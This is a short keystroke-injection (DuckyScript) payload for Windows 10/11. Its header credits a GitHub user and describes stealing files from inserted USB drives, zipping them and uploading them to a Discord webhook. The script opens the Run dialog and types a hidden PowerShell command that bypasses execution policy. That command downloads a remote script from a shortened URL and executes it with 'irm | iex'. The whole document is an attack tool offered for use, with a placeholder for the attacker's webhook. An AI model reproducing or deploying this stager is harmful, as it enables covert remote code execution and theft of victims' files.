REM ┌────────────────────────────────────────────────────────┐
REM │ hooker01 | github.com/hooker01                          │
REM │ Description: Detects inserted USB drives, copies files  │
REM │              (excluding videos), zips them under 10MB,  │
REM │              and uploads each archive to a Discord      │
REM │              webhook.                                   │
REM │ Note: Replace 'DISCORD_WEBHOOK_HERE' with your URL.     │     
REM │ Target: Windows 10/11                                   │
REM └────────────────────────────────────────────────────────┘




DELAY 500
ESC
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='WEBHOOK_LINK'; irm https://is.gd/8gYqLf | iex
ENTER
